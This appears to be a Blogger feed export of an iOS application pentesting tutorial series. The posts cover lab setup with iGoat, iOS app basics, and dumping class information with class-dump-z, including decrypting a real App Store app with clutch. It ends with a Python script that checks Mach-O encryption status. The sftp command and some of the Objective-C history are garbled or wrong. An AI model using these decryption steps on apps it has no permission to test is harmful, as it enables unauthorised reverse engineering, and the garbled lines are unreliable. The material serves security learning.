<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigOh7NfUi-WkhTDGZ-ewFiRWzrzgzY7UGeu2-kj5aLWvZXBBKkURyKkwTVWGg0e9tcqb1DfWuIRf-c4fxtvDSFuCupsqZ13Lzl-y0J1KnvACabjJBiCPmSOHiwTU7Vn-3x69YixFqGo6M/s1600/Screen+Shot+2017-04-16+at+8.25.47+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigOh7NfUi-WkhTDGZ-ewFiRWzrzgzY7UGeu2-kj5aLWvZXBBKkURyKkwTVWGg0e9tcqb1DfWuIRf-c4fxtvDSFuCupsqZ13Lzl-y0J1KnvACabjJBiCPmSOHiwTU7Vn-3x69YixFqGo6M/s640/Screen+Shot+2017-04-16+at+8.25.47+PM.png" width="640" /></a></div>
<br />
<br />
5) In this same window, go to the Window menu and choose 50% under the Scale option, so the window running our application is a convenient size.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-EBWHtHI-7b0_4LUdBcSp7Ni5xs4nvEs-shQaKu5VUVUzTKyBL1Jc9MgXRNxmg8XmJAGSRDTEt-Q5WDBuv69IkmmTWUuEOL2dOUSL1RQJP5qCabahpRYLfkpvXMeSq4GkBb4MaR9cL-0/s1600/Screen+Shot+2017-04-16+at+8.27.29+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-EBWHtHI-7b0_4LUdBcSp7Ni5xs4nvEs-shQaKu5VUVUzTKyBL1Jc9MgXRNxmg8XmJAGSRDTEt-Q5WDBuv69IkmmTWUuEOL2dOUSL1RQJP5qCabahpRYLfkpvXMeSq4GkBb4MaR9cL-0/s640/Screen+Shot+2017-04-16+at+8.27.29+PM.png" width="640" /></a></div>
<br />
<br />
Looks Great.<br />
<br />
6) Now let's start the server which handles this application's requests and is required for the further exercises.<br />
In the same <b>igoat-master</b> folder you will find a folder called <b>server</b>; open it. In this folder you will see a Ruby file.<br />
<b>Just Run It !</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1ZpOAzthAxTyKc1kC0KD2vR3791kOa3HlDXwfL3CfbN0BUmtWAHJueyCXp6fZiB3JRBssjh1OxLlfjiHRo8kM-1IoMb8SrDBsFCdb53nI5wS_VgFq7fqTPCkzPticQp4NrYFNswkhB8/s1600/Screen+Shot+2017-04-16+at+8.30.02+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1ZpOAzthAxTyKc1kC0KD2vR3791kOa3HlDXwfL3CfbN0BUmtWAHJueyCXp6fZiB3JRBssjh1OxLlfjiHRo8kM-1IoMb8SrDBsFCdb53nI5wS_VgFq7fqTPCkzPticQp4NrYFNswkhB8/s640/Screen+Shot+2017-04-16+at+8.30.02+PM.png" width="640" /></a></div>
<b><br /></b>
<b>So All Set Now ! And we are ready to perform our exercise steps.</b><br />
<b><br /></b>
<b><br /></b><br />
<div style="text-align: right;">
<b><a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-5.html" target="_blank">Next Post>></a></b><b><div style="display: inline !important;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
</b></div>
<div style="text-align: right;">
<b><div>
iOS Application Pentesting Part 5 : </div>
<div>
Insecure HTTP Data Transit</div>
</b></div>
<b><br /><a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-3.html" target="_blank"><< Previous Post</a></b><br />
<b>iOS Application Pentesting Part 3 : Extracting iOS App Class Information</b>
<b><br /></b>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-35533434631754952492017-04-13T08:54:00.001+05:302017-04-13T09:54:10.833+05:30iOS Application Pentesting Part 3 : Extracting iOS App Class Information<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF8R8qxMyxXRMX06fBNfSv44SPo28QKCxoS4VQsFSG8-R8qhQGq_vCACNNZyb3-mhz_pGztpzt9sBjSTSalcYWEg-1MndkYMpHaQAqTTRt8I9_USokHbdSxAbFjbNktG0Lob2O5K4IAic/s1600/Screen+Shot+2017-04-12+at+10.18.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF8R8qxMyxXRMX06fBNfSv44SPo28QKCxoS4VQsFSG8-R8qhQGq_vCACNNZyb3-mhz_pGztpzt9sBjSTSalcYWEg-1MndkYMpHaQAqTTRt8I9_USokHbdSxAbFjbNktG0Lob2O5K4IAic/s320/Screen+Shot+2017-04-12+at+10.18.11+PM.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKJanrWuUt3UcsqUdxnZg7CvBEkFWoOmJbwmqXn_Ql93v1vlIdjW38FqucNWu5rb8I0Qdx_-OVTpfYBttlHjUaeQ_N0z6N9iXyck09qC4OhtpuaAmDLz9mCYeJ0IecIXzv80CozL4L5Vg/s1600/Screen+Shot+2017-04-12+at+10.15.34+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKJanrWuUt3UcsqUdxnZg7CvBEkFWoOmJbwmqXn_Ql93v1vlIdjW38FqucNWu5rb8I0Qdx_-OVTpfYBttlHjUaeQ_N0z6N9iXyck09qC4OhtpuaAmDLz9mCYeJ0IecIXzv80CozL4L5Vg/s320/Screen+Shot+2017-04-12+at+10.15.34+PM.png" width="320" /></a></div>
<br />
Every application has its own code base, which contains lots of information about its functionality and so on. It is always better if we can extract all the possible information about the application we are going to attack.<br />
<br />
Today we will see how to extract class information from an iOS application.<br />
<br />
Apple has made some modifications to their security, and nowadays most App Store apps are encrypted; they first need to be decrypted before class information can be extracted.<br />
<br />
So first we will see class dumping of non-encrypted apps.<br />
<br />
<b>Dumping Class Information Of Pre-Installed Applications</b><br />
We have 2 ways to find the app.<br />
<div style="text-align: left;">
1) <span style="background-color: white; font-family: 'menlo';">find / -type d -iname "Dam*.app"</span><br />
2) If the app was installed manually from an IPA file, then its directory would be Applications/<br />
<span style="background-color: white; font-family: "menlo";"><br /></span>
<br />
I am using the command line search for Damn Vulnerable iOS Application, which is developed by Prateek Gianchandani.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIwV-0QVH9ppCX9fVTnnjX3HyR5s7aAzHVvw7hOkI-fBGx10NxoPi6yNdh59U1-nrCljwZCo9MF9_KFh7VGLgYhpkh7q3ILz29joVNN9VNWc9Hudti040KfNAhA6FO8RJkVCVVZjUdj1k/s1600/Screen+Shot+2017-04-12+at+10.15.34+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIwV-0QVH9ppCX9fVTnnjX3HyR5s7aAzHVvw7hOkI-fBGx10NxoPi6yNdh59U1-nrCljwZCo9MF9_KFh7VGLgYhpkh7q3ILz29joVNN9VNWc9Hudti040KfNAhA6FO8RJkVCVVZjUdj1k/s640/Screen+Shot+2017-04-12+at+10.15.34+PM.png" width="640" /></a></div>
<a name='more'></a><br />
We found the application location: /Applications/DamVulnerableIOSApp.app<br />
<br />
Now first go into this folder [DamVulnerableIOSApp]; you will see a file shown in green, which is the executable file for that app. We need to use this file name to dump the classes.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXqP98pJyctx9wc94UenUUUaVC0TwmfJ4HzMQG8_aEhdK98dFtZ7qP3yTrNOW65MCVNDLPxXeFoHVNXbPsWC2KjDM27tcBBs7dit1dZCKkFKFt3f4Sv0QMWbfnWIvzaBoRd2ZdcmNKxD4/s1600/Screen+Shot+2017-04-12+at+10.19.59+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXqP98pJyctx9wc94UenUUUaVC0TwmfJ4HzMQG8_aEhdK98dFtZ7qP3yTrNOW65MCVNDLPxXeFoHVNXbPsWC2KjDM27tcBBs7dit1dZCKkFKFt3f4Sv0QMWbfnWIvzaBoRd2ZdcmNKxD4/s640/Screen+Shot+2017-04-12+at+10.19.59+PM.png" width="640" /></a></div>
<br />
<br />
Now let's extract this app's class information.<br />
<br />
class-dump-z DamVulnerableIOSApp.app/DamVulnerableIOSApp<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL85BWUfK12YRO1g1eNqaofMCGPeMAdL8uHEWDcH-VtmgwN28ZJXnlwfOjQDBCaWqEZZIJhfU8AJF7hcu0pV9jA4_oRwTjjOvT0kmqrQzcB4nPF212AlKO7EeQVQ9iftVO8yGYqjk8Lqk/s1600/Screen+Shot+2017-04-12+at+10.18.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL85BWUfK12YRO1g1eNqaofMCGPeMAdL8uHEWDcH-VtmgwN28ZJXnlwfOjQDBCaWqEZZIJhfU8AJF7hcu0pV9jA4_oRwTjjOvT0kmqrQzcB4nPF212AlKO7EeQVQ9iftVO8yGYqjk8Lqk/s640/Screen+Shot+2017-04-12+at+10.18.11+PM.png" width="640" /></a></div>
<br />
As we can see, we have tons of output, so it is better to save this output to a file for further analysis.<br />
To do this, we can use sftp. Log in to your device using <b>sftp root@192.168.0.3</b> and type your root user password.<br />
Then run <b>sftp /Applications/Appdirectory.app/Appname > outputfilename</b>.<br />
The file will be downloaded to your home folder if you are using a Mac; for Windows users it will be saved in your user profile's home folder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiifbRTtMUYSDffK1Z8heoefs6IaP84yQdv9kGVWpb8cZNE5RGOdPOFbtCxsTEH_moHVo4fWdfTfeh6dYQmhpP5hXCNMsTlqi30r9qumc7NaZo4_jTfPBwJ0rV_NsgU_wO3oo0igPmxpYw/s1600/Screen+Shot+2017-04-13+at+7.57.49+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiifbRTtMUYSDffK1Z8heoefs6IaP84yQdv9kGVWpb8cZNE5RGOdPOFbtCxsTEH_moHVo4fWdfTfeh6dYQmhpP5hXCNMsTlqi30r9qumc7NaZo4_jTfPBwJ0rV_NsgU_wO3oo0igPmxpYw/s640/Screen+Shot+2017-04-13+at+7.57.49+AM.png" width="640" /></a></div>
<br />
<div>
<br /></div>
This class information helps us understand the application's flow and logic.<br />
<br />
<b>Dumping Class Information Of Encrypted Apps</b><br />
<b><br /></b>
As we know, applications downloaded from the App Store are placed in <b>/var/containers/Bundle/Application</b>. Those apps are usually encrypted to avoid information disclosure, which makes extracting class information a very tough task.<br />
<br />
To overcome this issue, we need the clutch binary: place it in the /usr/bin folder and make it executable using <b>chmod +x clutch</b>.<br />
<b><br /></b>
First I used the command <b>clutch -i</b> [this command lists all installed applications with their bundle IDs,<br />
e.g. application.<Bundle ID>]<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4gtgc8LNJ9wTgW5l4wpvPp9Z-X6fZJUXL17X56iQpamT3R0Ex-iwTAZ49s4BCXn4w9-DQ1vXgDRL7De7dukeSxaF4_LyQRX4T7k6jz0nHr25v4A4UsmG2ndB_xUnd5uiy0qeUrRxDC9c/s1600/Screen+Shot+2017-04-13+at+8.44.22+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4gtgc8LNJ9wTgW5l4wpvPp9Z-X6fZJUXL17X56iQpamT3R0Ex-iwTAZ49s4BCXn4w9-DQ1vXgDRL7De7dukeSxaF4_LyQRX4T7k6jz0nHr25v4A4UsmG2ndB_xUnd5uiy0qeUrRxDC9c/s640/Screen+Shot+2017-04-13+at+8.44.22+AM.png" width="640" /></a></div>
<br />
In our case, I am using the Rediffmail app for the demo. So the application name is Rediffmail NG and its bundle ID is <b>com.rediff.com</b>.<br />
<b><br /></b>
Now use the command <b>clutch -b com.rediff.com</b> [this command will create a new file in the /var/tmp/clutch/<>/ directory].<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg0V61YHy9FiCXTgMr6wEsaWFOKZr9JrDMrYZJfXgQBCecRdFQ-RHBua-s_c0mAws2vMyVKUcnBuQ7LEpVFw1JQo_FO9lX7vvKRSVpnB7o4Jb3wwZGl9ryzj0CHfdz4yGHzVHhEnGEOoQ/s1600/Screen+Shot+2017-04-13+at+8.47.41+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg0V61YHy9FiCXTgMr6wEsaWFOKZr9JrDMrYZJfXgQBCecRdFQ-RHBua-s_c0mAws2vMyVKUcnBuQ7LEpVFw1JQo_FO9lX7vvKRSVpnB7o4Jb3wwZGl9ryzj0CHfdz4yGHzVHhEnGEOoQ/s640/Screen+Shot+2017-04-13+at+8.47.41+AM.png" width="640" /></a></div>
<br />
<br />
As we can see in the picture above, the file has been saved to /var/tmp/clutch/someid/. So let's go into this directory.<br />
We have an executable file in this directory. Great!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7rFfP1TaPEY4lTPmh43jYp6eM5DS2xhjIRoWUzNiiqan5YT-urCjkXxTq04qcExkJNi6YB1C18pP6HDe4huWKCvi1xW6Etqh0R83P7Ecrxv_PFjQffINTSl5VKBSAvNiReDwN874bPN4/s1600/Screen+Shot+2017-04-13+at+8.49.54+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7rFfP1TaPEY4lTPmh43jYp6eM5DS2xhjIRoWUzNiiqan5YT-urCjkXxTq04qcExkJNi6YB1C18pP6HDe4huWKCvi1xW6Etqh0R83P7Ecrxv_PFjQffINTSl5VKBSAvNiReDwN874bPN4/s640/Screen+Shot+2017-04-13+at+8.49.54+AM.png" width="640" /></a></div>
<br />
Now use the command <b>class-dump-z RediffmailNG</b> [this command will now extract the class information].<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg17wLquyXZpDDkUF3tbsAwoQDaKRYEYY9JXtvAOnlO_llSMRFJloY6poHYSOMZrstjHrnj7ykQlHBQL37IbKW0R65CgtnYTFIakGkOLZfvZj8HlJ098oz-x3ALLTjSbzN8A1bz8oiUoAg/s1600/Screen+Shot+2017-04-13+at+8.51.24+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="572" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg17wLquyXZpDDkUF3tbsAwoQDaKRYEYY9JXtvAOnlO_llSMRFJloY6poHYSOMZrstjHrnj7ykQlHBQL37IbKW0R65CgtnYTFIakGkOLZfvZj8HlJ098oz-x3ALLTjSbzN8A1bz8oiUoAg/s640/Screen+Shot+2017-04-13+at+8.51.24+AM.png" width="640" /></a></div>
<br />
<br />
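Before running class-dump-z, a practitioner will want to know whether the executable is actually FairPlay-encrypted, which is what decides whether the clutch step above is needed at all; the same check lets a developer confirm that the build pulled from a device is protected. The Python script below is an added example, not code from this post or from the clutch or class-dump-z projects: it parses the Mach-O header of a thin or fat binary and reports the cryptid of each LC_ENCRYPTION_INFO load command. The sample binaries it builds are constructed for the demo, not real app executables.<br />

```python
import struct
import sys

# Mach-O constants (values from Apple's mach-o/loader.h and mach-o/fat.h)
MH_MAGIC = 0xFEEDFACE          # 32-bit slice, little-endian on ARM devices
MH_MAGIC_64 = 0xFEEDFACF       # 64-bit slice
FAT_MAGIC = 0xCAFEBABE         # fat/universal wrapper, stored big-endian
LC_UUID = 0x1B
LC_ENCRYPTION_INFO = 0x21      # encryption_info_command (32-bit slices)
LC_ENCRYPTION_INFO_64 = 0x2C   # encryption_info_command_64
CPU_TYPE_ARM, CPU_TYPE_ARM64 = 0x0000000C, 0x0100000C

def parse_thin_slice(buf, base=0):
    """Walk the load commands of one thin Mach-O slice starting at `base`.
    Returns (is_64bit, cryptid): None = no LC_ENCRYPTION_INFO command,
    0 = command present but not encrypted, non-zero = FairPlay-encrypted."""
    magic = struct.unpack_from("<I", buf, base)[0]
    if magic == MH_MAGIC_64:
        is64, header_size = True, 32   # mach_header_64 has a trailing reserved field
    elif magic == MH_MAGIC:
        is64, header_size = False, 28
    else:
        raise ValueError("no little-endian Mach-O header at offset 0x%x" % base)
    ncmds, sizeofcmds = struct.unpack_from("<II", buf, base + 16)
    off, end = base + header_size, base + header_size + sizeofcmds
    cryptid = None
    for _ in range(ncmds):
        if off + 8 > end or off + 8 > len(buf):
            raise ValueError("load commands run past the end of the slice")
        cmd, cmdsize = struct.unpack_from("<II", buf, off)
        if cmdsize < 8 or off + cmdsize > end:
            raise ValueError("malformed load command at offset 0x%x" % off)
        if cmd in (LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64):
            # layout: cmd, cmdsize, cryptoff, cryptsize, cryptid[, pad]
            cryptid = struct.unpack_from("<I", buf, off + 16)[0]
        off += cmdsize
    return is64, cryptid

def encryption_status(buf):
    """Return [(arch_label, cryptid), ...] for each slice of a thin or fat binary."""
    if len(buf) < 32:
        raise ValueError("buffer too small to be a Mach-O file")
    if struct.unpack_from(">I", buf, 0)[0] == FAT_MAGIC:
        nfat = struct.unpack_from(">I", buf, 4)[0]
        results = []
        for i in range(nfat):   # fat_arch: cputype, cpusubtype, offset, size, align
            cputype, _, offset, _, _ = struct.unpack_from(">5I", buf, 8 + 20 * i)
            is64, cryptid = parse_thin_slice(buf, offset)
            arch = "cputype 0x%x (%s)" % (cputype, "64-bit" if is64 else "32-bit")
            results.append((arch, cryptid))
        return results
    is64, cryptid = parse_thin_slice(buf, 0)
    return [("64-bit" if is64 else "32-bit", cryptid)]

def describe(buf):
    """Human-readable verdict per slice: what the cryptid means for class-dump-z."""
    lines = []
    for arch, cryptid in encryption_status(buf):
        if cryptid is None:
            state = "no LC_ENCRYPTION_INFO: not an App Store build"
        elif cryptid == 0:
            state = "cryptid=0: not encrypted, class-dump-z can read it directly"
        else:
            state = "cryptid=%d: FairPlay-encrypted, class metadata unreadable until decrypted" % cryptid
        lines.append("%s -> %s" % (arch, state))
    return lines

# Constructed sample binaries for the demo (hypothetical, not real app executables).
def build_sample_slice(cryptid=None, is64=True):
    """Minimal header + LC_UUID + optional LC_ENCRYPTION_INFO(_64) command."""
    cmds = struct.pack("<II", LC_UUID, 24) + b"\x11" * 16
    if cryptid is not None and is64:
        cmds += struct.pack("<6I", LC_ENCRYPTION_INFO_64, 24, 0x4000, 0x8000, cryptid, 0)
    elif cryptid is not None:
        cmds += struct.pack("<5I", LC_ENCRYPTION_INFO, 20, 0x4000, 0x8000, cryptid)
    ncmds = 1 if cryptid is None else 2
    # header: magic, cputype, cpusubtype, filetype (2 = MH_EXECUTE), ncmds, sizeofcmds, flags[, reserved]
    if is64:
        return struct.pack("<8I", MH_MAGIC_64, CPU_TYPE_ARM64, 0, 2, ncmds, len(cmds), 0, 0) + cmds
    return struct.pack("<7I", MH_MAGIC, CPU_TYPE_ARM, 0, 2, ncmds, len(cmds), 0) + cmds

def build_sample_fat(slices):
    """Wrap thin slices in a fat header, each slice page-aligned as lipo does."""
    archs, body, offset = b"", b"", 0x1000
    for blob in slices:
        cputype, cpusubtype = struct.unpack_from("<II", blob, 4)
        archs += struct.pack(">5I", cputype, cpusubtype, offset, len(blob), 12)
        body += blob.ljust(0x1000, b"\0")
        offset += 0x1000
    header = struct.pack(">II", FAT_MAGIC, len(slices)) + archs
    return header.ljust(0x1000, b"\0") + body

if __name__ == "__main__":
    # pass an executable copied from the .app bundle as argv[1]; otherwise demo on the samples
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:
        data = build_sample_fat([build_sample_slice(1), build_sample_slice(0, is64=False)])
    print("\n".join(describe(data)))
```

On a binary that reports a non-zero cryptid, class-dump-z output will be garbage until the app has been decrypted; a cryptid of 0 on a build that was supposed to ship through the App Store is worth raising with the developers.<br />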
That's all for this part.<br />
<br />
If you enjoyed this post, please do share and comment. We love to hear from you. :)<br />
<br />
<a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-2-ios.html" target="_blank">< Previous Post</a><br />
iOS Application Pentesting Part 2 : iOS Application Basics<br />
<br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: #ffffff; min-height: 13.0px}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
</div>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: #ffffff}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-1219909127146589422017-04-13T08:54:00.000+05:302017-04-13T09:03:21.428+05:30iOS Application Pentesting Part 2 : iOS Application Basics<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNp2YIkFfGGJwGxMrG2aVbkkrLSe96mOZSpeO1gmvxgwo5b7yXgK7xH9lXP79xcoOAsxABDlf-MzmbPWJiCpCUx5ooWWkthVFzWvIzFEH83FsdNGgNcovB0r9P_JR17yTrHbVPujW2Lqc/s1600/ios-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNp2YIkFfGGJwGxMrG2aVbkkrLSe96mOZSpeO1gmvxgwo5b7yXgK7xH9lXP79xcoOAsxABDlf-MzmbPWJiCpCUx5ooWWkthVFzWvIzFEH83FsdNGgNcovB0r9P_JR17yTrHbVPujW2Lqc/s400/ios-logo.png" width="400" /></a></div>
<br />
In today's post, we will look at iOS applications. Knowing our enemy before attacking is very important for us ;)<br />
<br />
iOS: in simple words, it is the operating system which runs the various iDevices created by Apple Inc.<br />
<br />
iOS (formerly iPhone OS) is a mobile operating system created and developed by Apple Inc. exclusively for its hardware. It is the operating system that presently powers many of the company's mobile devices, including the iPhone, iPad, and iPod Touch. It is the second most popular mobile operating system globally after Android. iPad tablets are also the second most popular, by sales, against Android since 2013.[9]<br />
<a name='more'></a><br />
Originally unveiled in 2007 for the iPhone, iOS has been extended to support other Apple devices such as the iPod Touch (September 2007) and the iPad (January 2010). As of January 2017, Apple's App Store contains more than 2.2 million iOS applications, 1 million of which are native for iPads. These mobile apps have collectively been downloaded more than 130 billion times.<br />
[Source - <a href="https://en.wikipedia.org/wiki/IOS">https://en.wikipedia.org/wiki/IOS</a> ]<br />
<br />
Applications which come pre-installed on the device are placed in the /Applications folder on the device.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhu5qB2JXiMRuAZrsLF3YPKB_l8hANZ_FDolKNrckQziMojJVYawstUdGggsYvS0JeQfQxVczBpJrsB7foIvXNoJyoD3AkyhzcwCn5ZttHO1SQQGdDbAxn5iWoNsgPnAVE8vuKu4u__Yo/s1600/Screen+Shot+2017-04-11+at+10.08.01+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhu5qB2JXiMRuAZrsLF3YPKB_l8hANZ_FDolKNrckQziMojJVYawstUdGggsYvS0JeQfQxVczBpJrsB7foIvXNoJyoD3AkyhzcwCn5ZttHO1SQQGdDbAxn5iWoNsgPnAVE8vuKu4u__Yo/s640/Screen+Shot+2017-04-11+at+10.08.01+PM.png" width="640" /></a></div>
And applications installed separately by the user are stored in /var/containers/Bundle/Application/ [iOS 9]. On previous iOS versions the user application folder was /var/mobile/Applications/.<br />
<br />
It depends on your iOS version; kindly look up the storage location for your iOS version.<br />
<br />
Every device has its own hardware, the OS which runs on it, and then the applications which run on the OS.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkYHqPIofHNN1hESyyjJEQOBucwSk1r5FvgH2g0QSLbgDc1PIcL6q6HP-0czcWoZ0JI0psecifNjo7e72OKjKTabZHsUOxtLAMR2o1iV8Cx1YH3no8j2eXr6Jm0EL9FKhlYwayDSyu5D0/s1600/Screen+Shot+2017-04-11+at+9.33.54+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkYHqPIofHNN1hESyyjJEQOBucwSk1r5FvgH2g0QSLbgDc1PIcL6q6HP-0czcWoZ0JI0psecifNjo7e72OKjKTabZHsUOxtLAMR2o1iV8Cx1YH3no8j2eXr6Jm0EL9FKhlYwayDSyu5D0/s320/Screen+Shot+2017-04-11+at+9.33.54+PM.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Now the question arises: how are all these applications made?</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
iOS applications are written in Objective-C, which is derived from NeXT OS; we can say Objective-C is a newer version of NeXT OS. Most iOS applications are coded in Objective-C.</div>
<div class="western" style="margin-bottom: 0cm;">
<b>Objective-C</b> is a runtime-oriented language. A runtime language decides what to implement in a function, and makes other decisions, during the runtime of the application. But Objective-C is a runtime-oriented language rather than only a runtime language.
</div>
<div class="western" style="margin-bottom: 0cm;">
In short, this means that it may change the flow or decision when the code in the application is actually being executed.</div>
<div class="western" style="margin-bottom: 0cm;">
<br /></div>
<div class="western" style="margin-bottom: 0cm;">
The Objective-C model of object-oriented programming is based on message passing to object instances. In Objective-C one does not call a method; one sends a message. This is unlike the Simula-style programming model used by C++. The difference between these two concepts is in how the code referenced by the method or message name is executed. In a Simula-style language, the method name is in most cases bound to a section of code in the target class by the compiler. In Smalltalk and Objective-C, the target of a message is resolved at runtime, with the receiving object itself interpreting the message. A method is identified by a selector or SEL — a NUL-terminated string representing its name — and resolved to a C method pointer implementing it: an IMP.[17] A consequence of this is that the message-passing system has no type checking. The object to which the message is directed — the receiver — is not guaranteed to respond to a message, and if it does not, it raises an exception.[18]</div>
<div class="western" style="margin-bottom: 0cm;">
<br /></div>
<div class="western" style="margin-bottom: 0cm;">
Sending the message method to the object pointed to by the pointer obj would require the following code in C++:</div>
<div class="western" style="margin-bottom: 0cm;">
<br /></div>
<div class="western" style="margin-bottom: 0cm;">
obj->method(argument);</div>
<div class="western" style="margin-bottom: 0cm;">
In Objective-C, this is written as follows:</div>
<div class="western" style="margin-bottom: 0cm;">
<br /></div>
<div class="western" style="margin-bottom: 0cm;">
[obj method:argument];</div>
<div class="western" style="margin-bottom: 0cm;">
Both styles of programming have their strengths and weaknesses. Object-oriented programming in the Simula (C++) style allows multiple inheritance and faster execution by using compile-time binding whenever possible, but it does not support dynamic binding by default. It also forces all methods to have a corresponding implementation unless they are abstract. The Smalltalk-style programming as used in Objective-C allows messages to go unimplemented, with the method resolved to its implementation at runtime. For example, a message may be sent to a collection of objects, to which only some will be expected to respond, without fear of producing runtime errors. Message passing also does not require that an object be defined at compile time. An implementation is still required for the method to be called in the derived object. (See the dynamic typing section below for more advantages of dynamic (late) binding.)<br />
<br />
If you need more information on iOS please go this page - <a href="https://en.wikipedia.org/wiki/IOS">https://en.wikipedia.org/wiki/IOS</a><br />
<br />
<div style="text-align: right;">
<a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-3.html" target="_blank">Next Post</a></div>
<div style="text-align: right;">
iOS Application Pentesting Part 3 : Extracting iOS App Class Information</div>
<div style="text-align: left;">
<br />
< <a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-1.html" target="_blank">Previous Post</a></div>
<div style="text-align: left;">
iOS Application Pentesting Part 1 : Setting Up The Attacking Environment</div>
<div style="text-align: left;">
<br /></div>
</div>
<style type="text/css">
<!--
@page { margin: 2cm }
P { margin-bottom: 0.21cm }
-->
</style></div>
